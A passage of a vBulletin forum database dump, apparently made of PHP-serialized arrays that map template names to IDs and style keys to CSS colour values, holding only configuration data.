_size\";s:4:\"1294\";s:13:\"editor_smilie\";s:4:\"1295\";s:16:\"editor_smiliebox\";s:4:\"1296\";s:25:\"editor_smiliebox_category\";s:4:\"1297\";s:20:\"editor_smiliebox_row\";s:4:\"1298\";s:26:\"editor_smiliebox_straggler\";s:4:\"1299\";s:25:\"editor_styles_button_down\";s:4:\"1300\";s:26:\"editor_styles_button_hover\";s:4:\"1301\";s:27:\"editor_styles_button_normal\";s:4:\"1302\";s:29:\"editor_styles_button_selected\";s:4:\"1303\";s:23:\"editor_styles_menu_down\";s:4:\"1304\";s:24:\"editor_styles_menu_hover\";s:4:\"1305\";s:25:\"editor_styles_menu_normal\";s:4:\"1306\";s:24:\"editor_styles_popup_down\";s:4:\"1307\";s:18:\"editor_toolbar_off\";s:4:\"1308\";s:17:\"editor_toolbar_on\";s:4:\"1309\";s:8:\"editpoll\";s:4:\"1716\";s:8:\"editpost\";s:4:\"1717\";s:5:\"EXTRA\";s:4:\"1189\";s:6:\"EXTRA2\";s:4:\"1190\";s:3:\"FAQ\";s:4:\"1310\";s:6:\"faqbit\";s:4:\"1311\";s:11:\"faqbit_link\";s:4:\"1312\";s:6:\"footer\";s:4:\"1718\";s:10:\"formspacer\";s:4:\"1198\";s:9:\"formwidth\";s:4:\"1199\";s:16:\"formwidth_usercp\";s:4:\"1200\";s:12:\"FORUMDISPLAY\";s:4:\"1313\";s:25:\"forumdisplay_loggedinuser\";s:4:\"1314\";s:22:\"forumdisplay_moderator\";s:4:\"1315\";s:22:\"forumdisplay_sortarrow\";s:4:\"1316\";s:9:\"FORUMHOME\";s:4:\"1317\";s:21:\"forumhome_birthdaybit\";s:4:\"1318\";s:15:\"forumhome_event\";s:4:\"1319\";s:32:\"forumhome_forumbit_level1_nopost\";s:4:\"1320\";s:30:\"forumhome_forumbit_level1_post\";s:4:\"1321\";s:32:\"forumhome_forumbit_level2_nopost\";s:4:\"1322\";s:30:\"forumhome_forumbit_level2_post\";s:4:\"1323\";s:20:\"forumhome_lastpostby\";s:4:\"1324\";s:22:\"forumhome_loggedinuser\";s:4:\"1325\";s:25:\"forumhome_markread_script\";s:4:\"1326\";s:19:\"forumhome_moderator\";s:4:\"1327\";s:28:\"forumhome_subforumbit_nopost\";s:4:\"1328\";s:26:\"forumhome_subforumbit_post\";s:4:\"1329\";s:34:\"forumhome_subforumseparator_nopost\";s:4:\"1330\";s:32:\"forumhome_subforumseparator_post\";s:4:\"1331\";s:9:\"forumjump\";s:4:\"1719\";s:10:\"forumrules\";s:4:\"1720\";s:13:\"GENERIC_SHELL\";s:4:\"1721\";s:8:\"gobutton\";s:4:\"1722\";s:6:\"header\";s:4:\"1723\";s:11:\"headinclude\";s:4:\"1724\";s:12:\"help_avatars\";s:4:\"1332\";s:19:\"help_avatars_avatar\";s:4:\"1333\";s:21:\"help_avatars_category\";s:4:\"1334\";s:16:\"help_avatars_row\";s:4:\"1335\";s:12:\"help_bbcodes\";s:4:\"1336\";s:19:\"help_bbcodes_bbcode\";s:4:\"1337\";s:17:\"help_bbcodes_link\";s:4:\"1338\";s:10:\"help_rules\";s:4:\"1339\";s:12:\"help_smilies\";s:4:\"1340\";s:21:\"help_smilies_category\";s:4:\"1341\";s:19:\"help_smilies_smilie\";s:4:\"1342\";s:11:\"htmldoctype\";s:4:\"1201\";s:16:\"htmlextrasfolder\";s:4:\"1202\";s:17:\"humanverify_image\";s:4:\"1343\";s:20:\"humanverify_question\";s:4:\"1344\";s:21:\"humanverify_recaptcha\";s:4:\"1345\";s:12:\"imagesfolder\";s:4:\"1203\";s:13:\"imgdir_attach\";s:4:\"1204\";s:13:\"imgdir_button\";s:4:\"1205\";s:13:\"imgdir_editor\";s:4:\"1206\";s:11:\"imgdir_misc\";s:4:\"1207\";s:11:\"imgdir_poll\";s:4:\"1208\";s:13:\"imgdir_rating\";s:4:\"1209\";s:17:\"imgdir_reputation\";s:4:\"1210\";s:17:\"imgdir_statusicon\";s:4:\"1211\";s:6:\"im_aim\";s:4:\"1346\";s:6:\"im_icq\";s:4:\"1347\";s:10:\"im_message\";s:4:\"1348\";s:6:\"im_msn\";s:4:\"1349\";s:11:\"im_send_aim\";s:4:\"1350\";s:11:\"im_send_icq\";s:4:\"1351\";s:11:\"im_send_msn\";s:4:\"1352\";s:13:\"im_send_skype\";s:4:\"1353\";s:13:\"im_send_yahoo\";s:4:\"1354\";s:8:\"im_skype\";s:4:\"1355\";s:8:\"im_yahoo\";s:4:\"1356\";s:12:\"JOINREQUESTS\";s:4:\"1725\";s:15:\"joinrequestsbit\";s:4:\"1726\";s:6:\"legend\";s:4:\"1191\";s:8:\"lightbox\";s:4:\"1727\";s:6:\"lostpw\";s:4:\"1728\";s:8:\"mailform\";s:4:\"1729\";s:10:\"MEMBERINFO\";s:4:\"1357\";s:19:\"memberinfo_albumbit\";s:4:\"1358\";s:16:\"memberinfo_block\";s:4:\"1359\";s:24:\"memberinfo_block_aboutme\";s:4:\"1360\";s:23:\"memberinfo_block_albums\";s:4:\"1361\";s:28:\"memberinfo_block_contactinfo\";s:4:\"1362\";s:24:\"memberinfo_block_friends\";s:4:\"1363\";s:29:\"memberinfo_block_friends_mini\";s:4:\"1364\";s:23:\"memberinfo_block_groups\";s:4:\"1365\";s:28:\"memberinfo_block_infractions\";s:4:\"1366\";s:26:\"memberinfo_block_ministats\";s:4:\"1367\";s:29:\"memberinfo_block_profilefield\";s:4:\"1368\";s:31:\"memberinfo_block_profilepicture\";s:4:\"1369\";s:31:\"memberinfo_block_recentvisitors\";s:4:\"1370\";s:27:\"memberinfo_block_statistics\";s:4:\"1371\";s:33:\"memberinfo_block_visitormessaging\";s:4:\"1372\";s:14:\"memberinfo_css\";s:4:\"1373\";s:27:\"memberinfo_customfield_edit\";s:4:\"1374\";s:25:\"memberinfo_deletemessages\";s:4:\"1375\";s:16:\"memberinfo_imbit\";s:4:\"1376\";s:24:\"memberinfo_infractionbit\";s:4:\"1377\";s:25:\"memberinfo_membergroupbit\";s:4:\"1378\";s:23:\"memberinfo_profilefield\";s:4:\"1379\";s:32:\"memberinfo_profilefield_category\";s:4:\"1380\";s:25:\"memberinfo_publicgroupbit\";s:4:\"1381\";s:20:\"memberinfo_quickedit\";s:4:\"1382\";s:16:\"memberinfo_small\";s:4:\"1383\";s:25:\"memberinfo_socialgroupbit\";s:4:\"1384\";s:30:\"memberinfo_socialgroupbit_text\";s:4:\"1385\";s:15:\"memberinfo_tiny\";s:4:\"1386\";s:18:\"memberinfo_usercss\";s:4:\"1387\";s:21:\"memberinfo_visitorbit\";s:4:\"1388\";s:25:\"memberinfo_visitormessage\";s:4:\"1389\";s:33:\"memberinfo_visitormessage_deleted\";s:4:\"1390\";s:40:\"memberinfo_visitormessage_global_ignored\";s:4:\"1391\";s:33:\"memberinfo_visitormessage_ignored\";s:4:\"1392\";s:10:\"memberlist\";s:4:\"1393\";s:17:\"memberlist_letter\";s:4:\"1394\";s:21:\"memberlist_resultsbit\";s:4:\"1395\";s:27:\"memberlist_resultsbit_field\";s:4:\"1396\";s:25:\"memberlist_results_header\";s:4:\"1397\";s:17:\"memberlist_search\";s:4:\"1398\";s:32:\"memberlist_search_optional_input\";s:4:\"1399\";s:23:\"memberlist_search_radio\";s:4:\"1400\";s:24:\"memberlist_search_select\";s:4:\"1401\";s:33:\"memberlist_search_select_multiple\";s:4:\"1402\";s:25:\"memberlist_search_textbox\";s:4:\"1403\";s:12:\"messagewidth\";s:4:\"1212\";s:19:\"messagewidth_usercp\";s:4:\"1213\";s:25:\"moderation_deletepictures\";s:4:\"1404\";s:17:\"moderation_filter\";s:4:\"1405\";s:27:\"moderation_groupdiscussions\";s:4:\"1406\";s:24:\"moderation_groupmessages\";s:4:\"1407\";s:21:\"moderation_picturebit\";s:4:\"1408\";s:26:\"moderation_picturecomments\";s:4:\"1409\";s:19:\"moderation_pictures\";s:4:\"1410\";s:16:\"moderation_posts\";s:4:\"1411\";s:18:\"moderation_threads\";s:4:\"1412\";s:26:\"moderation_visitormessages\";s:4:\"1413\";s:17:\"modifyattachments\";s:4:\"1414\";s:20:\"modifyattachmentsbit\";s:4:\"1415\";s:12:\"modifyavatar\";s:4:\"1416\";s:15:\"modifyavatarbit\";s:4:\"1417\";s:22:\"modifyavatarbit_custom\";s:4:\"1418\";s:24:\"modifyavatarbit_noavatar\";s:4:\"1419\";s:21:\"modifyavatar_category\";s:4:\"1420\";s:15:\"modifybuddylist\";s:4:\"1421\";s:20:\"modifybuddylist_user\";s:4:\"1422\";s:16:\"modifyignorelist\";s:4:\"1423\";s:21:\"modifyignorelist_user\";s:4:\"1424\";s:13:\"modifyoptions\";s:4:\"1425\";s:22:\"modifyoptions_timezone\";s:4:\"1426\";s:23:\"modifyoptions_vbtwitter\";s:4:\"1779\";s:14:\"modifypassword\";s:4:\"1427\";s:17:\"modifyprivacy_bit\";s:4:\"1428\";s:13:\"modifyprofile\";s:4:\"1429\";s:16:\"modifyprofilepic\";s:4:\"1430\";s:20:\"modifyprofileprivacy\";s:4:\"1431\";s:22:\"modifyprofile_birthday\";s:4:\"1432\";s:15:\"modifysignature\";s:4:\"1433\";s:13:\"modifyusercss\";s:4:\"1434\";s:27:\"modifyusercss_backgroundbit\";s:4:\"1435\";s:27:\"modifyusercss_backgroundrow\";s:4:\"1436\";s:17:\"modifyusercss_bit\";s:4:\"1437\";s:19:\"modifyusercss_error\";s:4:\"1438\";s:24:\"modifyusercss_error_link\";s:4:\"1439\";s:25:\"modifyusercss_headinclude\";s:4:\"1440\";s:16:\"modifyusergroups\";s:4:\"1441\";s:27:\"modifyusergroups_displaybit\";s:4:\"1442\";s:28:\"modifyusergroups_groupleader\";s:4:\"1443\";s:31:\"modifyusergroups_joinrequestbit\";s:4:\"1444\";s:26:\"modifyusergroups_memberbit\";s:4:\"1445\";s:29:\"modifyusergroups_nonmemberbit\";s:4:\"1446\";s:30:\"modifyusergroups_requesttojoin\";s:4:\"1447\";s:22:\"modifyuserlist_confirm\";s:4:\"1448\";s:26:\"modifyuserlist_headinclude\";s:4:\"1449\";s:6:\"navbar\";s:4:\"1450\";s:11:\"navbar_link\";s:4:\"1451\";s:16:\"navbar_noticebit\";s:4:\"1452\";s:28:\"navbar_notifications_menubit\";s:4:\"1453\";s:13:\"newattachment\";s:4:\"1454\";s:16:\"newattachmentbit\";s:4:\"1455\";s:26:\"newattachment_errormessage\";s:4:\"1456\";s:20:\"newattachment_keybit\";s:4:\"1457\";s:7:\"newpoll\";s:4:\"1458\";s:18:\"newpost_attachment\";s:4:\"1459\";s:21:\"newpost_attachmentbit\";s:4:\"1460\";s:28:\"newpost_disablesmiliesoption\";s:4:\"1461\";s:20:\"newpost_errormessage\";s:4:\"1462\";s:15:\"newpost_preview\";s:4:\"1463\";s:13:\"newpost_quote\";s:4:\"1464\";s:20:\"newpost_threadmanage\";s:4:\"1465\";s:20:\"newpost_usernamecode\";s:4:\"1466\";s:8:\"newreply\";s:4:\"1467\";s:18:\"newreply_reviewbit\";s:4:\"1468\";s:25:\"newreply_reviewbit_ignore\";s:4:\"1469\";s:32:\"newreply_reviewbit_ignore_global\";s:4:\"1470\";s:9:\"newthread\";s:4:\"1471\";s:8:\"optgroup\";s:4:\"1730\";s:6:\"option\";s:4:\"1731\";s:16:\"outerborderwidth\";s:4:\"1214\";s:15:\"outertablewidth\";s:4:\"1215\";s:7:\"pagenav\";s:4:\"1472\";s:15:\"pagenav_curpage\";s:4:\"1473\";s:16:\"pagenav_pagelink\";s:4:\"1474\";s:19:\"pagenav_pagelinkrel\";s:4:\"1475\";s:26:\"picturecomment_commentarea\";s:4:\"1476\";s:18:\"picturecomment_css\";s:4:\"1477\";s:29:\"picturecomment_deletemessages\";s:4:\"1478\";s:21:\"picturecomment_editor\";s:4:\"1479\";s:19:\"picturecomment_form\";s:4:\"1480\";s:22:\"picturecomment_message\";s:4:\"1481\";s:30:\"picturecomment_message_deleted\";s:4:\"1482\";s:37:\"picturecomment_message_global_ignored\";s:4:\"1483\";s:30:\"picturecomment_message_ignored\";s:4:\"1484\";s:36:\"picturecomment_message_moderatedview\";s:4:\"1485\";s:22:\"picturecomment_preview\";s:4:\"1486\";s:16:\"pm_editfolderbit\";s:4:\"1487\";s:14:\"pm_editfolders\";s:4:\"1488\";s:14:\"pm_emptyfolder\";s:4:\"1489\";s:9:\"pm_filter\";s:4:\"1490\";s:14:\"pm_messagelist\";s:4:\"1491\";s:17:\"pm_messagelistbit\";s:4:\"1492\";s:24:\"pm_messagelistbit_ignore\";s:4:\"1493\";s:22:\"pm_messagelistbit_user\";s:4:\"1494\";s:26:\"pm_messagelist_periodgroup\";s:4:\"1495\";s:9:\"pm_movepm\";s:4:\"1496\";s:8:\"pm_newpm\";s:4:\"1497\";s:19:\"pm_nomessagehistory\";s:4:\"1498\";s:15:\"pm_popup_script\";s:4:\"1499\";s:13:\"pm_quickreply\";s:4:\"1500\";s:11:\"pm_receipts\";s:4:\"1501\";s:14:\"pm_receiptsbit\";s:4:\"1502\";s:9:\"pm_showpm\";s:4:\"1503\";s:10:\"pm_trackpm\";s:4:\"1504\";s:11:\"polleditbit\";s:4:\"1505\";s:10:\"pollnewbit\";s:4:\"1506\";s:10:\"polloption\";s:4:\"1507\";s:17:\"polloptions_table\";s:4:\"1508\";s:19:\"polloption_multiple\";s:4:\"1509\";s:11:\"pollpreview\";s:4:\"1510\";s:10:\"pollresult\";s:4:\"1511\";s:11:\"pollresults\";s:4:\"1512\";s:17:\"pollresults_table\";s:4:\"1513\";s:7:\"postbit\";s:4:\"1514\";s:18:\"postbit_attachment\";s:4:\"1515\";s:23:\"postbit_attachmentimage\";s:4:\"1516\";s:27:\"postbit_attachmentmoderated\";s:4:\"1517\";s:27:\"postbit_attachmentthumbnail\";s:4:\"1518\";s:21:\"postbit_automoderated\";s:4:\"1519\";s:15:\"postbit_deleted\";s:4:\"1520\";s:16:\"postbit_external\";s:4:\"1521\";s:14:\"postbit_ignore\";s:4:\"1522\";s:21:\"postbit_ignore_global\";s:4:\"1523\";s:10:\"postbit_ip\";s:4:\"1524\";s:14:\"postbit_legacy\";s:4:\"1525\";s:20:\"postbit_onlinestatus\";s:4:\"1526\";s:17:\"postbit_quickedit\";s:4:\"1527\";s:18:\"postbit_reputation\";s:4:\"1528\";s:15:\"postbit_wrapper\";s:4:\"1529\";s:11:\"posthistory\";s:4:\"1530\";s:27:\"posthistory_content_changed\";s:4:\"1531\";s:31:\"posthistory_content_not_changed\";s:4:\"1532\";s:19:\"posthistory_listbit\";s:4:\"1533\";s:11:\"posticonbit\";s:4:\"1534\";s:9:\"posticons\";s:4:\"1535\";s:11:\"printthread\";s:4:\"1536\";s:14:\"printthreadbit\";s:4:\"1537\";s:21:\"printthreadbit_ignore\";s:4:\"1538\";s:8:\"register\";s:4:\"1539\";s:18:\"register_coppaform\";s:4:\"1540\";s:14:\"register_rules\";s:4:\"1541\";s:19:\"register_verify_age\";s:4:\"1542\";s:10:\"reportitem\";s:4:\"1732\";s:10:\"reputation\";s:4:\"1543\";s:13:\"reputationbit\";s:4:\"1544\";s:15:\"reputation_ajax\";s:4:\"1545\";s:21:\"reputation_reasonbits\";s:4:\"1546\";s:19:\"reputation_yourpost\";s:4:\"1547\";s:13:\"search_forums\";s:4:\"1548\";s:14:\"search_results\";s:4:\"1549\";s:22:\"search_results_postbit\";s:4:\"1550\";s:32:\"search_results_postbit_lastvisit\";s:4:\"1551\";s:6:\"select\";s:4:\"1192\";s:12:\"sendtofriend\";s:4:\"1733\";s:11:\"shell_blank\";s:4:\"1734\";s:10:\"SHOWGROUPS\";s:4:\"1552\";s:19:\"showgroups_forumbit\";s:4:\"1553\";s:20:\"showgroups_usergroup\";s:4:\"1554\";s:23:\"showgroups_usergroupbit\";s:4:\"1555\";s:10:\"SHOWTHREAD\";s:4:\"1556\";s:23:\"showthread_bookmarksite\";s:4:\"1557\";s:15:\"showthread_list\";s:4:\"1558\";s:21:\"showthread_quickreply\";s:4:\"1559\";s:19:\"SHOWTHREAD_SHOWPOST\";s:4:\"1560\";s:27:\"showthread_similarthreadbit\";s:4:\"1561\";s:25:\"showthread_similarthreads\";s:4:\"1562\";s:11:\"smiliepopup\";s:4:\"1563\";s:20:\"smiliepopup_category\";s:4:\"1564\";s:15:\"smiliepopup_row\";s:4:\"1565\";s:18:\"smiliepopup_smilie\";s:4:\"1566\";s:21:\"smiliepopup_straggler\";s:4:\"1567\";s:12:\"SOCIALGROUPS\";s:4:\"1568\";s:27:\"socialgroups_accepttransfer\";s:4:\"1569\";s:24:\"socialgroups_addpictures\";s:4:\"1570\";s:34:\"socialgroups_addpicture_invalidurl\";s:4:\"1571\";s:34:\"socialgroups_addpicture_messagebit\";s:4:\"1572\";s:32:\"socialgroups_addpicture_messages\";s:4:\"1573\";s:25:\"socialgroups_categorylist\";s:4:\"1574\";s:29:\"socialgroups_categorylist_bit\";s:4:\"1575\";s:31:\"socialgroups_category_cloud_bit\";s:4:\"1576\";s:20:\"socialgroups_confirm\";s:4:\"1577\";s:16:\"socialgroups_css\";s:4:\"1578\";s:27:\"socialgroups_deletemessages\";s:4:\"1579\";s:23:\"socialgroups_discussion\";s:4:\"1580\";s:27:\"socialgroups_discussionview\";s:4:\"1581\";s:31:\"socialgroups_discussion_deleted\";s:4:\"1582\";s:31:\"socialgroups_discussion_ignored\";s:4:\"1583\";s:33:\"socialgroups_discussion_quickedit\";s:4:\"1584\";s:19:\"socialgroups_editor\";s:4:\"1585\";s:17:\"socialgroups_form\";s:4:\"1586\";s:18:\"socialgroups_group\";s:4:\"1587\";s:26:\"socialgroups_grouplist_bit\";s:4:\"1588\";s:29:\"socialgroups_groupmodlist_bit\";s:4:\"1589\";s:25:\"socialgroups_groupsub_bit\";s:4:\"1590\";s:19:\"socialgroups_manage\";s:4:\"1591\";s:22:\"socialgroups_managebit\";s:4:\"1592\";s:26:\"socialgroups_managemembers\";s:4:\"1593\";s:23:\"socialgroups_memberlist\";s:4:\"1594\";s:20:\"socialgroups_message\";s:4:\"1595\";s:28:\"socialgroups_message_deleted\";s:4:\"1596\";s:28:\"socialgroups_message_ignored\";s:4:\"1597\";s:25:\"socialgroups_mygroups_bit\";s:4:\"1598\";s:34:\"socialgroups_mygroups_listview_bit\";s:4:\"1599\";s:25:\"socialgroups_newgroup_bit\";s:4:\"1600\";s:34:\"socialgroups_newgroup_listview_bit\";s:4:\"1601\";s:21:\"socialgroups_overview\";s:4:\"1602\";s:25:\"socialgroups_owngroup_bit\";s:4:\"1603\";s:20:\"socialgroups_picture\";s:4:\"1604\";s:23:\"socialgroups_picturebit\";s:4:\"1605\";s:21:\"socialgroups_pictures\";s:4:\"1606\";s:19:\"socialgroups_search\";s:4:\"1607\";s:22:\"socialgroups_subscribe\";s:4:\"1608\";s:28:\"socialgroups_subscribe_group\";s:4:\"1609\";s:26:\"socialgroups_subscriptions\";s:4:\"1610\";s:21:\"socialgroups_transfer\";s:4:\"1611\";s:10:\"spacersize\";s:4:\"1216\";s:12:\"spacer_close\";s:4:\"1735\";s:11:\"spacer_open\";s:4:\"1736\";s:14:\"STANDARD_ERROR\";s:4:\"1737\";s:19:\"STANDARD_ERROR_LITE\";s:4:\"1738\";s:20:\"STANDARD_ERROR_LOGIN\";s:4:\"1739\";s:17:\"STANDARD_REDIRECT\";s:4:\"1740\";s:9:\"SUBSCRIBE\";s:4:\"1612\";s:20:\"subscribe_choosetype\";s:4:\"1613\";s:24:\"subscribe_confirm_delete\";s:4:\"1614\";s:19:\"subscribe_folderbit\";s:4:\"1615\";s:14:\"subscribe_move\";s:4:\"1616\";s:21:\"subscribe_showfolders\";s:4:\"1617\";s:12:\"subscription\";s:4:\"1618\";s:22:\"subscription_activebit\";s:4:\"1619\";s:25:\"subscription_availablebit\";s:4:\"1620\";s:20:\"subscription_payment\";s:4:\"1621\";s:23:\"subscription_paymentbit\";s:4:\"1622\";s:30:\"subscription_payment_2checkout\";s:4:\"1623\";s:33:\"subscription_payment_authorizenet\";s:4:\"1624\";s:27:\"subscription_payment_ccbill\";s:4:\"1625\";s:33:\"subscription_payment_moneybookers\";s:4:\"1626\";s:27:\"subscription_payment_nochex\";s:4:\"1627\";s:27:\"subscription_payment_paypal\";s:4:\"1628\";s:29:\"subscription_payment_worldpay\";s:4:\"1629\";s:10:\"tablewidth\";s:4:\"1217\";s:6:\"tagbit\";s:4:\"1630\";s:14:\"tagbit_wrapper\";s:4:\"1631\";s:13:\"tag_cloud_box\";s:4:\"1632\";s:20:\"tag_cloud_box_search\";s:4:\"1633\";s:21:\"tag_cloud_headinclude\";s:4:\"1634\";s:14:\"tag_cloud_link\";s:4:\"1635\";s:14:\"tag_cloud_page\";s:4:\"1636\";s:8:\"tag_edit\";s:4:\"1637\";s:13:\"tag_edit_ajax\";s:4:\"1638\";s:13:\"tag_managebit\";s:4:\"1639\";s:10:\"tag_search\";s:4:\"1640\";s:13:\"td, th, p, li\";s:4:\"1193\";s:18:\"textarea, .bginput\";s:4:\"1194\";s:16:\"textareacols_ie4\";s:4:\"1218\";s:16:\"textareacols_ns4\";s:4:\"1219\";s:16:\"textareacols_ns6\";s:4:\"1220\";s:11:\"THREADADMIN\";s:4:\"1641\";s:24:\"threadadmin_authenticate\";s:4:\"1642\";s:21:\"threadadmin_copyposts\";s:4:\"1643\";s:23:\"threadadmin_deleteposts\";s:4:\"1644\";s:24:\"threadadmin_deletethread\";s:4:\"1645\";s:25:\"threadadmin_deletethreads\";s:4:\"1646\";s:20:\"threadadmin_easyspam\";s:4:\"1647\";s:24:\"threadadmin_easyspam_ban\";s:4:\"1648\";s:28:\"threadadmin_easyspam_confirm\";s:4:\"1649\";s:32:\"threadadmin_easyspam_headinclude\";s:4:\"1650\";s:31:\"threadadmin_easyspam_infraction\";s:4:\"1651\";s:26:\"threadadmin_easyspam_ipbit\";s:4:\"1652\";s:30:\"threadadmin_easyspam_ip_option\";s:4:\"1653\";s:34:\"threadadmin_easyspam_skipped_prune\";s:4:\"1654\";s:28:\"threadadmin_easyspam_userbit\";s:4:\"1655\";s:32:\"threadadmin_easyspam_user_option\";s:4:\"1656\";s:22:\"threadadmin_editthread\";s:4:\"1657\";s:26:\"threadadmin_imod_menu_post\";s:4:\"1658\";s:28:\"threadadmin_imod_menu_thread\";s:4:\"1659\";s:18:\"threadadmin_logbit\";s:4:\"1660\";s:22:\"threadadmin_managepost\";s:4:\"1661\";s:22:\"threadadmin_mergeposts\";s:4:\"1662\";s:23:\"threadadmin_mergethread\";s:4:\"1663\";s:24:\"threadadmin_mergethreads\";s:4:\"1664\";s:21:\"threadadmin_moveposts\";s:4:\"1665\";s:22:\"threadadmin_movethread\";s:4:\"1666\";s:23:\"threadadmin_movethreads\";s:4:\"1667\";s:19:\"threadadmin_postbit\";s:4:\"1668\";s:9:\"threadbit\";s:4:\"1669\";s:22:\"threadbit_announcement\";s:4:\"1670\";s:17:\"threadbit_deleted\";s:4:\"1671\";s:19:\"threadbit_lastvisit\";s:4:\"1672\";s:18:\"threadbit_pagelink\";s:4:\"1673\";s:10:\"titleimage\";s:4:\"1221\";s:6:\"USERCP\";s:4:\"1674\";s:24:\"usercp_groupattentionbit\";s:4:\"1675\";s:21:\"usercp_groupinvitebit\";s:4:\"1676\";s:20:\"usercp_nav_folderbit\";s:4:\"1677\";s:27:\"usercp_newvisitormessagebit\";s:4:\"1678\";s:21:\"usercp_reputationbits\";s:4:\"1679\";s:12:\"USERCP_SHELL\";s:4:\"1680\";s:25:\"userfield_checkbox_option\";s:4:\"1681\";s:24:\"userfield_optional_input\";s:4:\"1682\";s:15:\"userfield_radio\";s:4:\"1683\";s:22:\"userfield_radio_option\";s:4:\"1684\";s:16:\"userfield_select\";s:4:\"1685\";s:25:\"userfield_select_multiple\";s:4:\"1686\";s:23:\"userfield_select_option\";s:4:\"1687\";s:18:\"userfield_textarea\";s:4:\"1688\";s:17:\"userfield_textbox\";s:4:\"1689\";s:17:\"userfield_wrapper\";s:4:\"1690\";s:14:\"userinfraction\";s:4:\"1691\";s:17:\"userinfractionbit\";s:4:\"1692\";s:21:\"userinfraction_banbit\";s:4:\"1693\";s:23:\"userinfraction_groupbit\";s:4:\"1694\";s:22:\"userinfraction_infobit\";s:4:\"1695\";s:19:\"userinfraction_view\";s:4:\"1696\";s:8:\"usernote\";s:4:\"1697\";s:13:\"usernote_note\";s:4:\"1698\";s:21:\"visitormessage_editor\";s:4:\"1699\";s:22:\"visitormessage_preview\";s:4:\"1700\";s:25:\"visitormessage_simpleview\";s:4:\"1701\";s:33:\"visitormessage_simpleview_deleted\";s:4:\"1702\";s:9:\"WHOPOSTED\";s:4:\"1703\";s:12:\"whopostedbit\";s:4:\"1704\";s:10:\"WHOSONLINE\";s:4:\"1705\";s:13:\"whosonlinebit\";s:4:\"1706\";s:20:\"whosonline_resolveip\";s:4:\"1707\";}', 'a:131:{s:12:\"body_bgcolor\";s:7:\"#E1E1E2\";s:12:\"body_fgcolor\";s:7:\"#000000\";s:12:\"page_bgcolor\";s:7:\"#FFFFFF\";s:12:\"page_fgcolor\";s:7:\"#000000\";s:15:\"tborder_bgcolor\";s:7:\"#D1D1E1\";s:15:\"tborder_fgcolor\";s:7:\"#000000\";s:12:\"tcat_bgcolor\";s:7:\"#869BBF\";s:12:\"tcat_fgcolor\";s:7:\"#FFFFFF\";s:13:\"thead_bgcolor\";s:7:\"#5C7099\";s:13:\"thead_fgcolor\";s:7:\"#FFFFFF\";s:13:\"tfoot_bgcolor\";s:7:\"#3E5C92\";s:13:\"tfoot_fgcolor\";s:7:\"#E0E0F6\";s:12:\"alt1_bgcolor\";s:7:\"#F5F5FF\";s:12:\"alt1_fgcolor\";s:7:\"#000000\";s:12:\"alt2_bgcolor\";s:7:\"#E1E4F2\";s:12:\"alt2_fgcolor\";s:7:\"#000000\";s:17:\"inlinemod_bgcolor\";s:7:\"#FFFFCC\";s:17:\"inlinemod_fgcolor\";s:7:\"#000000\";s:15:\"wysiwyg_bgcolor\";s:7:\"#F5F5FF\";s:15:\"wysiwyg_fgcolor\";s:7:\"#000000\";s:12:\"time_fgcolor\";s:7:\"#666686\";s:17:\"highlight_fgcolor\";s:7:\"#FF0000\";s:13:\"fjsel_bgcolor\";s:7:\"#3E5C92\";s:13:\"fjsel_fgcolor\";s:7:\"#E0E0F6\";s:15:\"fjdpth0_bgcolor\";s:7:\"#F7F7F7\";s:15:\"fjdpth0_fgcolor\";s:7:\"#000000\";s:13:\"panel_bgcolor\";s:7:\"#E4E7F5\";s:13:\"panel_fgcolor\";s:7:\"#000000\";s:21:\"panelsurround_bgcolor\";s:7:\"#D1D4E0\";s:21:\"panelsurround_fgcolor\";s:7:\"#000000\";s:14:\"legend_fgcolor\";s:7:\"#22229C\";s:22:\"vbmenu_control_bgcolor\";s:7:\"#738FBF\";s:22:\"vbmenu_control_fgcolor\";s:7:\"#FFFFFF\";s:20:\"vbmenu_popup_bgcolor\";s:7:\"#FFFFFF\";s:20:\"vbmenu_popup_fgcolor\";s:7:\"#000000\";s:21:\"vbmenu_option_bgcolor\";s:7:\"#BBC7CE\";s:21:\"vbmenu_option_fgcolor\";s:7:\"#000000\";s:21:\"vbmenu_hilite_bgcolor\";s:7:\"#8A949E\";s:21:\"vbmenu_hilite_fgcolor\";s:7:\"#FFFFFF\";s:19:\"body_link_n_fgcolor\";s:7:\"#22229C\";s:19:\"body_link_v_fgcolor\";s:7:\"#22229C\";s:19:\"body_link_m_fgcolor\";s:7:\"#FF4400\";s:20:\"tborder_border_color\";s:18:\" 1px solid #0B198C\";s:19:\"tcat_link_n_fgcolor\";s:7:\"#ffffff\";s:19:\"tcat_link_v_fgcolor\";s:7:\"#ffffff\";s:19:\"tcat_link_m_fgcolor\";s:7:\"#FFFF66\";s:20:\"thead_link_n_fgcolor\";s:7:\"#FFFFFF\";s:20:\"thead_link_v_fgcolor\";s:7:\"#FFFFFF\";s:20:\"thead_link_m_fgcolor\";s:7:\"#FFFF00\";s:20:\"tfoot_link_n_fgcolor\";s:7:\"#E0E0F6\";s:20:\"tfoot_link_v_fgcolor\";s:7:\"#E0E0F6\";s:20:\"tfoot_link_m_fgcolor\";s:7:\"#FFFF66\";s:22:\"wysiwyg_link_n_fgcolor\";s:7:\"#22229C\";s:22:\"wysiwyg_link_v_fgcolor\";s:7:\"#22229C\";s:22:\"wysiwyg_link_m_fgcolor\";s:7:\"#FF4400\";s:18:\"panel_border_color\";s:11:\" 2px outset\";s:29:\"vbmenu_control_link_n_fgcolor\";s:7:\"#FFFFFF\";s:29:\"vbmenu_control_link_v_fgcolor\";s:7:\"#FFFFFF\";s:29:\"vbmenu_control_link_m_fgcolor\";s:7:\"#FFFFFF\";s:25:\"vbmenu_popup_border_color\";s:18:\" 1px solid 